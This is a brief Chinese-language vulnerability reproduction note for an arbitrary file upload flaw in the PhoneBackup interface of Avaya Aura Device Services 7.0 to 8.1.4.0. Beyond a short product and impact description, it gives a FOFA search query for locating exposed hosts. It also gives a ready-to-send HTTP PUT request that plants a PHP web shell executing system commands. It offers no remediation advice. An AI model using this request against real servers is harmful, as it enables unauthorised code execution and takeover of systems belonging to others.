产品简介
Avaya Aura Device Services是美国Avaya公司的一个应用软件。提供一个管理 Avaya 端点功能。
漏洞概述
Avaya Aura Device Services 系统PhoneBackup接口处存在任意文件上传漏洞,攻击者可绕过验证上传任意文件获取服务器权限。
影响范围
Avaya Aura Device Services 7.0-8.1.4.0版本
复现环境
FOFA:app=”AVAYA-Aura-Utility-Server”
漏洞复现
PUT /PhoneBackup/123.php HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: AVAYA
Content-Length: 23
<?php system('whoami');
访问上传的文件